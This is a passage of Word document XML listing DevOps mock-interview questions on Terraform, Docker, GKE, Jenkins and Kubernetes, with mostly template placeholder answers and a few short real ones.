      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How do you map internal port 80 to external port 8000 in a Terraform Docker container resource?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Ports</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Ports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map internal port 80 to external port 8000 in a Terraform Docker container resource?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. How do you reference one Terraform resource from another?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Dependencies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reference one Terraform resource from another?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. How do you use the image_id attribute of a docker_image resource in a docker_container resource?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Docker Image</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Docker Image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use the image_id attribute of a docker_image resource in a docker_container resource?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. Differentiate between terraform init, terraform validate, and terraform apply.</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Differentiate between terraform init, terraform validate, and terraform apply.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. How do provider version constraints work in Terraform, for example ~&gt; 3.0.1?</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provider version constraints work in Terraform, for example ~&gt; 3.0.1?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. How would you identify missing Terraform configuration required for successful validation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Troubleshooting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missing Terraform configuration required for successful validation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. What is the purpose of the Docker provider in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker/Terraform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Docker/Terraform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the Docker provider in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q17. What is the difference between a Docker image and a Docker container?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker/Basics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Docker image is the read-only, immutable template (filesystem layers plus metadata) built from a Dockerfile; a container is a running (or stopped) instance of that image with its own writable layer, network, and process space.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q18. Why do we expose ports for a Docker container?</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expose ports for a Docker container?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q19. What is the difference between internal and external ports?</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internal and external ports?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q20. How do you run an Nginx container using Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Docker Hands-On</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Docker 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run an Nginx container using Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q21. What happens if the required provider version is incorrect?</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the required provider version is incorrect?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q22. Explain when you would use terraform init, terraform validate, terraform fmt, terraform plan, terraform apply, and terraform destroy.</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when you would use terraform init, terraform validate, terraform fmt, terraform plan, terraform apply, and terraform destroy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q23. What is Infrastructure as Code (IaC)?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Infrastructure as Code is the practice of defining and managing infrastructure (servers, networks, databases) through versioned, declarative configuration files instead of manual console clicks, making infrastructure repeatable, reviewable, and auditable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q24. Why do we use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Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q25. What are providers in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providers in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q26. What are resources in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resources in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q27. What is the Terraform state file?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Terraform state file?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q28. What is the purpose of required_providers?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Providers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Providers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required_providers?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q29. Explain resource dependencies in Terraform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Dependencies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resource dependencies in Terraform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q30. What is the difference between terraform validate and terraform plan?</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terraform validate and terraform plan?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q31. How do you pin a provider version?</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pin a provider version?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q32. How would you deploy a Docker container using Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Docker Hands-On</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Docker 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 Docker container using Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 70 - GCP DevOps and GKE Screening</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Your profile looks more DevOps-focused. What have you done specifically in DevOps?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DevOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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profile looks more DevOps-focused. What have you done specifically in DevOps?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. In the DevOps area, what exactly are you trying to do? What are your day-to-day responsibilities?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DevOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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the DevOps area, what exactly are you trying to do? What are your day-to-day responsibilities?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Which cloud platform are you strongest in: GCP, AWS, or Azure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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cloud platform are you strongest in: GCP, AWS, or Azure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. What are the last three major DevOps tasks or projects you have done in GCP?</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last three major DevOps tasks or projects you have done in GCP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. What are the key GCP services you have used?</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key GCP services you have used?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. What is the difference between GKE Standard Mode and Autopilot Mode?</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GKE Standard Mode and Autopilot Mode?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Can you explain the GKE architecture?</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the GKE architecture?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. How do you secure a GKE cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GKE/Security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a GKE cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. Have you used Jenkins CI/CD pipelines with Bitbucket?</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Jenkins CI/CD pipelines with Bitbucket?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. What is the CI workflow in Jenkins?</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CI workflow in Jenkins?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. How would you design a CI/CD pipeline in GCP? Explain the complete flow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GCP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/GCP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 CI/CD pipeline in GCP? Explain the complete flow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. Would you use Cloud Source Repositories or an external Git repository such as GitHub, Bitbucket, or GitLab in your pipeline?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/Git</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/Git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Would you use Cloud Source Repositories or an external Git repository such as GitHub, Bitbucket, or GitLab in your pipeline?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. Do you have experience implementing GCP with EDM, Salesforce, or any data platform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Data Platform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Data Platform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experience implementing GCP with EDM, Salesforce, or any data platform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. Do you have experience with Liquibase or database migration?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Database Migration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Database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experience with Liquibase or database migration?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. Do you have real-time experience with containerization technologies like Docker and Kubernetes?</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real-time experience with containerization technologies like Docker and Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. Can you explain a real project where you containerized and deployed an application?</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a real project where you containerized and deployed an application?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q17. How do you monitor containerized applications?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monitor containerized applications?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q18. How do you perform logging and troubleshoot errors in Docker/Kubernetes environments?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Logging/Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Logging/Troubleshooting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perform logging and troubleshoot errors in Docker/Kubernetes environments?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q19. Which monitoring tools have you used for Kubernetes, such as Prometheus, ELK, Datadog, or Cloud Monitoring?</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used for Kubernetes, such as Prometheus, ELK, Datadog, or Cloud Monitoring?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 71 - Docker Kubernetes CI/CD DevSecOps Deep Dive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. What is the purpose of EXPOSE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EXPOSE in a Dockerfile?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. What is RUN used for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RUN used for in a Dockerfile?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How do you expose a FastAPI application on port 8000 inside a Docker container?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker/FastAPI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Docker/FastAPI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FastAPI application on port 8000 inside a Docker container?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. How does the application code become available inside the Docker container?</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application code become available inside the Docker container?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. What command starts the application inside the container?</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command starts the application inside the container?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How do you publish a Docker container port to the host?</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publish a Docker container port to the host?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. What is the purpose of docker run -p?</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docker run -p?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. What are the different types of Kubernetes Services?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Services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different types of Kubernetes Services?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. How do you expose an application externally?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
